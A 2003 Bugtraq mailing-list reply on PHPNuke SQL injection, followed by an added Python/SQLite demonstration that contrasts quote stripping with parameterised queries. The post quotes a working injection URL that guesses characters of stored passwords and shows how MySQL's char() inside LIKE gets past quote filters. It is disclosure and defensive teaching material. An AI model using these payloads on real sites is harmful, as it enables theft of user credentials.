Bugtraq mailing list archives

Re: PHPNuke SQL Injection


From: Martin Eiszner <martin () websec org>
Date: Fri, 21 Feb 2003 08:11:18 +0100


hola,

On 20 Feb 2003 20:36:11 -0000
Lucas Armstrong <lucas () cgishield com> wrote:

> To get around this problem, one could use the mysql char()
> function which will output any ascii value, without using quotes. So to
> guess the letter 'a' the hacker could use char(97). Here is an example url
> guessing the 3rd character in the pwd column as 'a':
> http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char(97)&type=stories

JFYI:

this may be off topic but it is worth mentioning .. a couple of months ago we found out 
that the mysql char() function can be used within the "like() - function" to place 
quotes.

this may help somebody doing sql-injection in a "quote-stripped :-)" environment.

example query:
---*---
select id,Name,password from Users where id = 1 and (user() like "%root%");
---*---

and now "without" quotes:
---*---
select id,Name,password from Users where id = 1 and (user() like char(37,114,111,111,116,37));
---*---


...


nice day,


mEi





 

-- 
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE

mei () websec org
http://www.websec.org
tel: 0043 699 121772 37
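An added example (not code from this thread or from PHPNuke) showing why the quote stripping the post alludes to is not a defense: the char()-built LIKE payload from the message passes a quote filter untouched and changes a concatenated query, while a bound parameter and an integer check on a numeric field like `days` both neutralise it. It uses SQLite, which also has char() and LIKE, with a constructed Users table and the user() test rewritten against the Name column.

```python
import re
import sqlite3

# Constructed demo table; not the real PHPNuke schema.
SCHEMA = """
CREATE TABLE Users (id INTEGER, Name TEXT, password TEXT);
INSERT INTO Users VALUES (1, 'alice', 'pw-a'), (2, 'root', 'pw-r'), (3, 'bob', 'pw-b');
"""

# Payload from the thread, with "user() like ..." rewritten against the Name
# column so it runs in SQLite. char(37,114,111,111,116,37) builds '%root%'.
PAYLOAD = "1 or (Name like char(37,114,111,111,116,37))"


def strip_quotes(value: str) -> str:
    """The 'quote-stripped environment': removes ' and " and nothing else,
    so a string assembled with char() is left untouched."""
    return re.sub(r"""['"]""", "", value)


def is_int_param(value: str) -> bool:
    """Type check a numeric parameter such as days should get before any SQL."""
    return re.fullmatch(r"\d+", value) is not None


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_concat(conn: sqlite3.Connection, id_param: str) -> list:
    """Vulnerable pattern: strip quotes, then concatenate into the statement.
    The injected LIKE is evaluated as SQL and pulls in the 'root' row."""
    sql = "select id,Name,password from Users where id = " + strip_quotes(id_param)
    return conn.execute(sql + " order by id").fetchall()


def lookup_param(conn: sqlite3.Connection, id_param: str) -> list:
    """Hardened pattern: the value is bound as data and compared against id as
    a whole; the non-numeric payload matches no row."""
    return conn.execute(
        "select id,Name,password from Users where id = ? order by id", (id_param,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concat(db, PAYLOAD))   # two rows, incl. root
    print("parameterised:", lookup_param(db, PAYLOAD))   # no rows
    print("days is int?", is_int_param(PAYLOAD), is_int_param("1"))
```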

